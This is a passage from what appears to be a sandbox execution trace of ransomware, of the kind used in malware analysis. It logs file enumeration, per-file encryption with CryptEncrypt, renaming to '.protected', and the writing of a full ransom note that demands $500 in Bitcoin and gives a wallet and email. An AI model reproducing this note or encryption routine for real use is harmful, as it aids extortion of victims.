users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0053.957] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 78 [0053.957] StrStrW (lpFirst="WordMUI.xml", lpSrch=".txt") returned 0x0 [0053.957] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 78 [0053.957] StrStrW (lpFirst="WordMUI.xml", lpSrch=".rar") returned 0x0 [0053.957] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 78 [0053.957] StrStrW (lpFirst="WordMUI.xml", lpSrch=".zip") returned 0x0 [0053.957] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x708, lpOverlapped=0x0) returned 1 [0053.994] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff8f8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.994] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x708, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x708, lpOverlapped=0x0) returned 1 [0053.994] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0053.994] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0053.994] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0053.994] CloseHandle (hObject=0xb4) returned 1 [0053.995] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.protected") returned 88 [0053.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.protected")) returned 1 [0053.995] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0053.995] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0053.996] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0053.996] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0053.996] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0053.996] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0053.997] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0053.997] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0053.997] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0053.997] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0053.997] CloseHandle (hObject=0xa4) returned 1 [0053.997] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0053.997] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0053.997] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0053.997] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0053.997] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0053.997] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0053.997] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C") returned 66 [0053.997] lstrcmpW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0053.997] lstrcmpW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0053.997] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*") returned 68 [0053.998] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0054.068] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0054.068] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0054.068] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0054.068] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0054.068] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0054.068] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\.") returned 68 [0054.068] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.068] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0054.068] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0054.068] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0054.068] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0054.068] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0054.069] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0054.069] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0054.069] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0054.069] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0054.069] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0054.069] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0054.069] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\..") returned 69 [0054.069] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0054.069] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.069] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0054.069] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0054.069] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0054.069] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0054.069] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0054.069] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0054.069] lstrcmpiW (lpString1="Proof.en", lpString2="Windows") returned -1 [0054.069] lstrcmpiW (lpString1="Proof.en", lpString2="Program Files") returned 1 [0054.069] lstrcmpiW (lpString1="Proof.en", lpString2="Program Files (x86)") returned 1 [0054.069] lstrcmpiW (lpString1="Proof.en", lpString2="$Recycle.bin") returned 1 [0054.069] lstrcmpiW (lpString1="Proof.en", lpString2="System Volume Information") returned -1 [0054.069] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en") returned 75 [0054.069] lstrcmpW (lpString1="Proof.en", lpString2=".") returned 1 [0054.069] lstrcmpW (lpString1="Proof.en", lpString2="..") returned 1 [0054.069] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*") returned 77 [0054.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x4a9270 [0054.069] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0054.069] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0054.070] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0054.070] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0054.070] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0054.070] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\.") returned 77 [0054.070] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.070] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0054.070] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0054.070] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0054.070] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0054.070] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0054.070] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0054.070] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\..") returned 78 [0054.070] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0054.070] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.070] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0054.070] lstrcmpiW (lpString1="Proof.cab", lpString2="Windows") returned -1 [0054.070] lstrcmpiW (lpString1="Proof.cab", lpString2="Program Files") returned 1 [0054.070] lstrcmpiW (lpString1="Proof.cab", lpString2="Program Files (x86)") returned 1 [0054.070] lstrcmpiW (lpString1="Proof.cab", lpString2="$Recycle.bin") returned 1 [0054.070] lstrcmpiW (lpString1="Proof.cab", lpString2="System Volume Information") returned -1 [0054.070] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 85 [0054.070] StrStrIW (lpFirst="Proof.cab", lpSrch=".protected") returned 0x0 [0054.070] lstrcmpW (lpString1="Proof.cab", lpString2="RESTORE_FILES.txt") returned -1 [0054.070] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0054.070] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0054.070] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0054.071] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 85 [0054.071] StrStrW (lpFirst="Proof.cab", lpSrch=".txt") returned 0x0 [0054.071] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 85 [0054.071] StrStrW (lpFirst="Proof.cab", lpSrch=".rar") returned 0x0 [0054.071] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 85 [0054.071] StrStrW (lpFirst="Proof.cab", lpSrch=".zip") returned 0x0 [0054.071] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0054.113] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.113] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0054.113] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.113] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0054.126] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0054.127] CloseHandle (hObject=0x150) returned 1 [0054.544] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.protected") returned 95 [0054.544] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.protected")) returned 1 [0054.545] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0054.545] lstrcmpiW (lpString1="Proof.msi", lpString2="Windows") returned -1 [0054.545] lstrcmpiW (lpString1="Proof.msi", lpString2="Program Files") returned 1 [0054.545] lstrcmpiW (lpString1="Proof.msi", lpString2="Program Files (x86)") returned 1 [0054.545] lstrcmpiW (lpString1="Proof.msi", lpString2="$Recycle.bin") returned 1 [0054.545] lstrcmpiW (lpString1="Proof.msi", lpString2="System Volume Information") returned -1 [0054.545] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 85 [0054.545] StrStrIW (lpFirst="Proof.msi", lpSrch=".protected") returned 0x0 [0054.545] lstrcmpW (lpString1="Proof.msi", lpString2="RESTORE_FILES.txt") returned -1 [0054.545] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0054.545] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0054.545] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0054.545] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 85 [0054.545] StrStrW (lpFirst="Proof.msi", lpSrch=".txt") returned 0x0 [0054.545] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 85 [0054.545] StrStrW (lpFirst="Proof.msi", lpSrch=".rar") returned 0x0 [0054.545] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 85 [0054.545] StrStrW (lpFirst="Proof.msi", lpSrch=".zip") returned 0x0 [0054.545] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0054.611] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.611] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0054.612] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.612] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0054.634] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0054.634] CloseHandle (hObject=0x150) returned 1 [0054.682] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.protected") returned 95 [0054.682] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.protected")) returned 1 [0054.683] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0054.683] lstrcmpiW (lpString1="Proof.xml", lpString2="Windows") returned -1 [0054.683] lstrcmpiW (lpString1="Proof.xml", lpString2="Program Files") returned 1 [0054.683] lstrcmpiW (lpString1="Proof.xml", lpString2="Program Files (x86)") returned 1 [0054.683] lstrcmpiW (lpString1="Proof.xml", lpString2="$Recycle.bin") returned 1 [0054.683] lstrcmpiW (lpString1="Proof.xml", lpString2="System Volume Information") returned -1 [0054.683] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 85 [0054.683] StrStrIW (lpFirst="Proof.xml", lpSrch=".protected") returned 0x0 [0054.683] lstrcmpW (lpString1="Proof.xml", lpString2="RESTORE_FILES.txt") returned -1 [0054.683] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0054.683] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0054.683] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0054.683] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 85 [0054.683] StrStrW (lpFirst="Proof.xml", lpSrch=".txt") returned 0x0 [0054.683] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 85 [0054.683] StrStrW (lpFirst="Proof.xml", lpSrch=".rar") returned 0x0 [0054.683] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 85 [0054.683] StrStrW (lpFirst="Proof.xml", lpSrch=".zip") returned 0x0 [0054.683] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x543, lpOverlapped=0x0) returned 1 [0054.697] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffabd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.697] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x543, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x543, lpOverlapped=0x0) returned 1 [0054.697] SetFilePointerEx (in: hFile=0x150, 